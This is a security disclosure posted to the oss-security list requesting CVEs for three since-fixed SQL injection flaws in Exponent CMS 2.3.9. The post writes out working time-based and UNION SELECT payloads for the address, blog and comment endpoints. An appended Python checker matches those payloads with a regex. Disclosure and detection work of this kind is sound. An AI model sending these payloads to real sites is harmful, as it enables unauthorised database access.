Date: Sun, 18 Sep 2016 12:09:04 +0800
From: felix k3y <felixk3y@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request: Exponent CMS 2.3.9 SQL injection vulnerabilities

Hi, I reported the following SQL Injection vulnerabilities to the
ExponentCMS team on Sep 13, 2016:

1)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/addressbook/controllers/addressController.php#L166-L175

2)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/blog/controllers/blogController.php#L192-L195

3)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/core/controllers/expCommentController.php#L129-L134


/index.php?controller=address&action=activate_address
In the first case, you can send "id=1 and if(1,sleep(1),0)%23" in the
POST data of an HTTP request;

/index.php?controller=blog&action=show&title=xx' union select
1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23
In the second, you can send "title=xx' union select
1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23" in the GET data of an
HTTP request;

/index.php?controller=expComment&action=showComments&content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s&config[disable_nested_comments]=1
In the last one, you can send
"content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s" in
the GET data of an HTTP request.

And now, all SQL injection vulnerabilities have been fixed.

https://exponentcms.lighthouseapp.com/projects/61783/changesets/e916702a91a6342bbab483a2be2ba2f11dca3aa3
https://github.com/exponentcms/exponent-cms/commit/e916702a91a6342bbab483a2be2ba2f11dca3aa3

I would like to request CVEs for those issues (if not done so).

thx.
--------------------------------------
felixk3y#gmail.com
penghua#silence.com.cn
PKAV Team
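As an added example (not part of the original post and not code from the Exponent CMS project), a small request-inspection check that flags the three endpoints named in the report when their injectable parameter carries SQL-looking content. The endpoint and parameter names come from the report above; the sample requests are constructed from the quoted ones, and the indicator pattern is an assumption of this example, not Exponent's fix.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints from the report: (controller, action) -> (injectable parameter,
# where the report says the value is sent).
WATCHED = {
    ("address", "activate_address"): ("id", "body"),
    ("blog", "show"): ("title", "query"),
    ("expComment", "showComments"): ("content_id", "query"),
}

# Crude indicators matching the payload shapes in the report (UNION SELECT,
# a time-based SLEEP probe, a trailing comment). Assumed for this example and
# noisy on legitimate values containing '#' or '--'; tune before production use.
SQLI_PATTERN = re.compile(r"union\s+select|sleep\s*\(|--\s|#|/\*", re.IGNORECASE)

def check_request(uri, body=""):
    """Return [(parameter, decoded value)] for values that look like injection.

    uri is the request target (path plus query string); body is the raw
    application/x-www-form-urlencoded POST body, if any. Decoding happens in
    parse_qs, so %23 and %20 are compared as '#' and ' '.
    """
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    controller = query.get("controller", [""])[0]
    action = query.get("action", [""])[0]
    target = WATCHED.get((controller, action))
    if target is None:
        return []
    param, location = target
    source = query if location == "query" else parse_qs(body, keep_blank_values=True)
    return [(param, v) for v in source.get(param, []) if SQLI_PATTERN.search(v)]

# Constructed samples based on the requests quoted in the report.
SAMPLES = [
    ("/index.php?controller=address&action=activate_address",
     "id=1 and if(1,sleep(1),0)%23"),
    ("/index.php?controller=blog&action=show&title=xx'%20union%20select%201,user(),3%23", ""),
    ("/index.php?controller=expComment&action=showComments"
     "&content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s"
     "&config[disable_nested_comments]=1", ""),
    ("/index.php?controller=blog&action=show&title=hello-world", ""),  # benign
]

if __name__ == "__main__":
    for uri, body in SAMPLES:
        print(uri, "->", check_request(uri, body))
```

Note that the first case travels in the POST body, which a standard web-server access log does not record, so this check needs proxy, WAF or application-level request capture to cover it.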
